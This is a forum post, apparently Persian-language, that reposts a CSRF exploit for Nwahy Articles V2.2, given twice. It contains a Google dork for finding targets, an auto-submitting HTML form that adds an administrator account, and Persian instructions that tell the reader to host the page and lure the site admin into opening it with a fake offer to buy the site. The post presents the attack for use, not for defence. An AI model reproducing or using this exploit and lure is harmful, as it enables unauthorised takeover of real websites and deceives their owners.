توییت
#########################################
[~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin
[~] Author: DaOne
[~] Date: 18-7-2012
[~] Category: webapps
[~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar
[~] Google dork: intext:"Powered by Nwahy Articles V2.2"
##########################################
[#] ~[ Exploit ]~
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert">
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="site" value="http://www.nwahy.com"/>
<input type="hidden" name="name" value="..."/>
<input type="hidden" name="groubtype" value="1"/>
</form>
</body>
</html>
##########################################
اینم آموزش فقط یه جایی واسه پیام فرستادن به ادمین پیدا کنید و اکسپلویتو با فرمت html ذخیره کنید و بعد توی توضیحاتی که دارین برای ادمین میفرستین بگین من میخوام این سایتو با یک قیمت زیاد بخرم اگه میخوای بفروشی بیا داخل این سایت و شما میرین html رو تو یه هاست آپ میکنید و لینک رو میزارین تو توضیحات اگه شانس بیارین پس از چند ساعت ادمین اون رو باز کرده باشه شما ادمین میشید در ضمن میتونید user name و password رو عوض کنید تو Html فقط یوز رو یه چیزی بزارین ادمین شک نکنه
موفق باشید :15:
[~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin
[~] Author: DaOne
[~] Date: 18-7-2012
[~] Category: webapps
[~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar
[~] Google dork: intext:"Powered by Nwahy Articles V2.2"
##########################################
[#] ~[ Exploit ]~
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert">
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="site" value="http://www.nwahy.com"/>
<input type="hidden" name="name" value="..."/>
<input type="hidden" name="groubtype" value="1"/>
</form>
</body>
</html>
##########################################
اینم آموزش فقط یه جایی واسه پیام فرستادن به ادمین پیدا کنید و اکسپلویتو با فرمت html ذخیره کنید و بعد توی توضیحاتی که دارین برای ادمین میفرستین بگین من میخوام این سایتو با یک قیمت زیاد بخرم اگه میخوای بفروشی بیا داخل این سایت و شما میرین html رو تو یه هاست آپ میکنید و لینک رو میزارین تو توضیحات اگه شانس بیارین پس از چند ساعت ادمین اون رو باز کرده باشه شما ادمین میشید در ضمن میتونید user name و password رو عوض کنید تو Html فقط یوز رو یه چیزی بزارین ادمین شک نکنه
موفق باشید :15: